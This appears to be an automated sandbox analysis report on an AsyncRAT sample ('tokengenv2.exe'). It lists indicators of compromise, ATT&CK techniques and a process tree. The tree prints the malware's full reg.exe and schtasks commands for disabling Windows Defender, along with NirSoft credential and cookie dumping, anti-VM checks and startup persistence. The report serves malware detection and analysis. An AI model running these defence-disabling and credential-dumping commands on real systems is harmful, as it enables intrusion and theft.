asyncrat | 337ee11eb36a403a120a88bfd48081c43c09bcac526744b23e9be52eab9179cf

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000800000001ab82-12.dat	family_asyncrat

Detected Nirsoft tools 7 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/1932-33-0x000001E5310D0000-0x000001E531412000-memory.dmp	Nirsoft
behavioral1/files/0x000700000001ab93-87.dat	Nirsoft
behavioral1/memory/3516-108-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/files/0x000700000001ab90-110.dat	Nirsoft
behavioral1/memory/3516-117-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/4404-114-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral1/files/0x000700000001ab92-131.dat	Nirsoft

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tokengenv2.exe

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1932-33-0x000001E5310D0000-0x000001E531412000-memory.dmp	WebBrowserPassView
behavioral1/files/0x000700000001ab93-87.dat	WebBrowserPassView

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tokengenv2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tokengenv2.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1814517.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1814517.exe	svchost.exe

Executes dropped EXE 4 IoCs

pid	Process
212	svchost.exe
4464	RuntimeBroker.exe
1932	RtkBtManServ.exe
64	snuvcdsm.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Wine	tokengenv2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ab8f-101.dat	upx
behavioral1/memory/4404-102-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral1/files/0x000700000001ab91-104.dat	upx
behavioral1/memory/3516-108-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/memory/3516-117-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/memory/4404-114-0x0000000000400000-0x000000000045B000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
13	discord.com
14	discord.com
5	discord.com
6	discord.com
7	discord.com
11	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	api64.ipify.org
4	api64.ipify.org

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tokengenv2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	snuvcdsm.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	RtkBtManServ.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	svchost.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
64	snuvcdsm.exe
64	snuvcdsm.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1932	RtkBtManServ.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4484 wrote to memory of 212	4484	tokengenv2.exe	71
PID 4484 wrote to memory of 212	4484	tokengenv2.exe	71
PID 4484 wrote to memory of 212	4484	tokengenv2.exe	71
PID 4484 wrote to memory of 4464	4484	tokengenv2.exe	72
PID 4484 wrote to memory of 4464	4484	tokengenv2.exe	72
PID 4484 wrote to memory of 4464	4484	tokengenv2.exe	72
PID 212 wrote to memory of 1932	212	svchost.exe	74
PID 212 wrote to memory of 1932	212	svchost.exe	74
PID 212 wrote to memory of 5072	212	svchost.exe	75
PID 212 wrote to memory of 5072	212	svchost.exe	75
PID 212 wrote to memory of 5072	212	svchost.exe	75
PID 5072 wrote to memory of 4584	5072	cmd.exe	77
PID 5072 wrote to memory of 4584	5072	cmd.exe	77
PID 5072 wrote to memory of 4584	5072	cmd.exe	77
PID 5072 wrote to memory of 1236	5072	cmd.exe	78
PID 5072 wrote to memory of 1236	5072	cmd.exe	78
PID 5072 wrote to memory of 1236	5072	cmd.exe	78
PID 5072 wrote to memory of 3576	5072	cmd.exe	79
PID 5072 wrote to memory of 3576	5072	cmd.exe	79
PID 5072 wrote to memory of 3576	5072	cmd.exe	79
PID 5072 wrote to memory of 3884	5072	cmd.exe	80
PID 5072 wrote to memory of 3884	5072	cmd.exe	80
PID 5072 wrote to memory of 3884	5072	cmd.exe	80
PID 5072 wrote to memory of 4736	5072	cmd.exe	81
PID 5072 wrote to memory of 4736	5072	cmd.exe	81
PID 5072 wrote to memory of 4736	5072	cmd.exe	81
PID 5072 wrote to memory of 4576	5072	cmd.exe	82
PID 5072 wrote to memory of 4576	5072	cmd.exe	82
PID 5072 wrote to memory of 4576	5072	cmd.exe	82
PID 5072 wrote to memory of 1636	5072	cmd.exe	83
PID 5072 wrote to memory of 1636	5072	cmd.exe	83
PID 5072 wrote to memory of 1636	5072	cmd.exe	83
PID 5072 wrote to memory of 3896	5072	cmd.exe	84
PID 5072 wrote to memory of 3896	5072	cmd.exe	84
PID 5072 wrote to memory of 3896	5072	cmd.exe	84
PID 5072 wrote to memory of 4964	5072	cmd.exe	85
PID 5072 wrote to memory of 4964	5072	cmd.exe	85
PID 5072 wrote to memory of 4964	5072	cmd.exe	85
PID 5072 wrote to memory of 2720	5072	cmd.exe	86
PID 5072 wrote to memory of 2720	5072	cmd.exe	86
PID 5072 wrote to memory of 2720	5072	cmd.exe	86
PID 5072 wrote to memory of 4988	5072	cmd.exe	87
PID 5072 wrote to memory of 4988	5072	cmd.exe	87
PID 5072 wrote to memory of 4988	5072	cmd.exe	87
PID 5072 wrote to memory of 4016	5072	cmd.exe	88
PID 5072 wrote to memory of 4016	5072	cmd.exe	88
PID 5072 wrote to memory of 4016	5072	cmd.exe	88
PID 5072 wrote to memory of 2752	5072	cmd.exe	89
PID 5072 wrote to memory of 2752	5072	cmd.exe	89
PID 5072 wrote to memory of 2752	5072	cmd.exe	89
PID 5072 wrote to memory of 4164	5072	cmd.exe	90
PID 5072 wrote to memory of 4164	5072	cmd.exe	90
PID 5072 wrote to memory of 4164	5072	cmd.exe	90
PID 5072 wrote to memory of 960	5072	cmd.exe	91
PID 5072 wrote to memory of 960	5072	cmd.exe	91
PID 5072 wrote to memory of 960	5072	cmd.exe	91
PID 5072 wrote to memory of 3048	5072	cmd.exe	92
PID 5072 wrote to memory of 3048	5072	cmd.exe	92
PID 5072 wrote to memory of 3048	5072	cmd.exe	92
PID 5072 wrote to memory of 1944	5072	cmd.exe	93
PID 5072 wrote to memory of 1944	5072	cmd.exe	93
PID 5072 wrote to memory of 1944	5072	cmd.exe	93
PID 5072 wrote to memory of 4580	5072	cmd.exe	94
PID 5072 wrote to memory of 4580	5072	cmd.exe	94

C:\Users\Admin\AppData\Local\Temp\tokengenv2.exe
"C:\Users\Admin\AppData\Local\Temp\tokengenv2.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4484
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
    "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4ErS1hhvtg5YEfyrc456+M8G6AlIrw0V3vaIB/HOnVdG6ECo2q6v5KNtrZ8KU2Ub2p4XDNqJ24QBK3VPkoYPGHBNLl+bX8eAr5P3aGtPrdZlsljOP32sizsH1t8lUnUWA=
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:3248
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:64
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:3104
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:3580
      - C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
        6⤵
        
        PID:4404
      - C:\Users\Admin\AppData\Local\Temp\splwow64.exe
        
        C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
        6⤵
        
        PID:3516
      - C:\Users\Admin\AppData\Local\Temp\hh.exe
        
        C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
        6⤵
        
        PID:4792
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:164
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:3680
      - C:\Users\Admin\AppData\Local\Temp\xwizard.exe
        
        C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
        6⤵
        
        PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:4584
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1236
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3576
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3884
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:4736
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:4576
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1636
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:3896
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:4964
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2720
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
      4⤵
      System Location Discovery: System Language Discovery
      PID:4988
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4016
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2752
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4164
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:960
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:3048
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:1944
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:4580
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:4592
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:4572
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1644
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2996
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2972
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3564
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1488
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:532
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:4152
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:2456
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:4488
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      System Location Discovery: System Language Discovery
      PID:4132
- C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion